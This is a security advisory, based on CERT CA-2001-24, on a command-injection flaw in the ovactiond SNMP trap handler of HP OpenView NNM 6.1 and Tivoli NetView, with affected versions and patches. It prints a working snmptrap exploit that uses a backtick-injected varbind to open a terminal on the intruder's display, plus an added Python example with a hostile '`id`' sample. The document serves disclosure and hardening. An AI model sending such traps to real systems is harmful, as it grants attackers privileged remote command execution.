COMMAND

    OpenView and NetView

SYSTEMS AFFECTED

    Systems running HP OpenView Network Node Manager (NNM) Version 6.1
    Systems running Tivoli NetView Versions 5.x and 6.x

PROBLEM

    The following is based on CERT Advisory CA-2001-24.  ovactiond is a
    component of OpenView by Hewlett-Packard Company (HP) and of NetView
    by Tivoli, an IBM Company (Tivoli).  These products are used to
    manage large systems and networks.  There is a serious vulnerability
    in ovactiond that allows intruders to execute arbitrary commands with
    elevated privileges.  This may subsequently lead to an intruder
    gaining administrative control of a vulnerable machine.

    ovactiond is the SNMP trap and event handler for both OpenView and
    NetView.   There is  a vulnerability  in ovactiond  that allows an
    intruder  to  execute  arbitrary  commands  by sending a malicious
    message to  the management  server.   These commands  run with the
    privileges of  the ovactiond  process, which  varies according  to
    the operating system.

    OpenView version 6.1 is  vulnerable in the default  configuration.
    Versions  prior  to  6.1  are   not  vulnerable  in  the   default
    configuration, but  there are  public reports  that versions prior
    to 6.1 may be vulnerable if users have made customizations to  the
    trapd.conf file.

    Tivoli NetView versions  5.x and 6.x  are not vulnerable  with the
    default configuration.   It is,  however, likely  that  customized
    configurations are vulnerable.   This security vulnerability  only
    exists if an authorized  user configures additional event  actions
    and  specifies  potentially  destructive  varbinds  (those of type
    string or opaque).
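    As an added illustration (not code from the advisory, HP or Tivoli), the
    unsafe pattern the advisory describes, pasting string/opaque varbinds into
    a shell command, beside a hardened equivalent that builds an argv list
    and refuses risky varbinds; the `$N` action template syntax, the script
    path and the sample varbinds are assumptions constructed for the example.

```python
import re
import shlex

# Varbind types the advisory names as risky when substituted into an
# event action: string and opaque.
RISKY_TYPES = {"string", "opaque"}
# Characters that let a substituted value be reinterpreted by /bin/sh.
SHELL_META = re.compile(r"[`$;|&<>(){}'\"\\\n]")


def expand_naive(template, varbinds):
    """Vulnerable pattern: paste varbind values into one command string
    destined for a shell.  Returned as a string only, never executed."""
    cmd = template
    for i, (_vtype, value) in enumerate(varbinds, start=1):
        cmd = cmd.replace(f"${i}", value)
    return cmd


def offending_varbinds(varbinds):
    """1-based indices of string/opaque varbinds carrying shell
    metacharacters; the check a hardened handler applies before acting."""
    return [i for i, (vtype, value) in enumerate(varbinds, start=1)
            if vtype in RISKY_TYPES and SHELL_META.search(value)]


def expand_safe(template, varbinds):
    """Hardened pattern: build an argv list (no shell involved) and refuse
    the action if any risky varbind fails the check.  Each $N must be a
    whole word in the template (an assumption of this example).
    Returns (argv, None) on success or (None, reason) on rejection."""
    bad = offending_varbinds(varbinds)
    if bad:
        return None, f"shell metacharacters in varbind(s) {bad}"
    argv = []
    for word in shlex.split(template):
        m = re.fullmatch(r"\$(\d+)", word)
        if m is None:
            argv.append(word)
            continue
        idx = int(m.group(1))
        if not 1 <= idx <= len(varbinds):
            return None, f"action references missing varbind ${idx}"
        argv.append(varbinds[idx - 1][1])  # one argv element, never re-parsed
    return argv, None


# Constructed sample: a benign trap and one carrying a backtick payload.
ACTION = "/opt/OV/bin/notify.sh $1 $2 $3"   # assumed action template
BENIGN = [("string", "node01"), ("string", "linkDown"), ("string", "eth0")]
HOSTILE = [("string", ""), ("string", ""), ("string", "`id`")]
```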

    An intruder can execute arbitrary commands with the privileges  of
    the ovactiond process.  On UNIX systems, ovactiond typically  runs
    as user  bin; on  Windows systems  it typically  runs in the Local
    System security context.   On Windows NT  systems, this allows  an
    intruder  to  gain  administrative   control  of  the   underlying
    operating system.   On UNIX  systems, an  intruder may  be able to
    leverage bin access to gain root access.

    Additionally,  systems  running  these  products  often have trust
    relationships  with  other  network  devices.   An  intruder   who
    compromises these systems  may be able  to leverage this  trust to
    compromise other devices on the network or to make changes to  the
    network configuration.

    Exploit:

        snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s ""

SOLUTION

    On June  21, 2001,  HP released  a security  bulletin (HP SB #154)
    and a patch for this  vulnerability in OpenView version 6.1.   For
    more information, see

        http://us-support.external.hp.com/cki/bin/doc.pl/screen=ckiDisplayDocument?docId=200000055277985
        http://www.kb.cert.org/vuls/id/952171

    Apply one of these patches:

        HP-UX 11.00   HP-UX 10.20   SOLARIS 2.X   WinNT4.X/2000
        PHSS_23780    PHSS_23779    PSOV_02905    NNM_00698

    NNM 6.2 is not vulnerable.

    Tivoli has developed a patch for versions 5.x and 6.x.  The  patch
    addresses  the  vulnerability  in  ovactiond,  as  well  as taking
    preventative  measures  on  other  components specific to NetView.
    Tivoli has published information on this vulnerability at

        http://www.tivoli.com/support/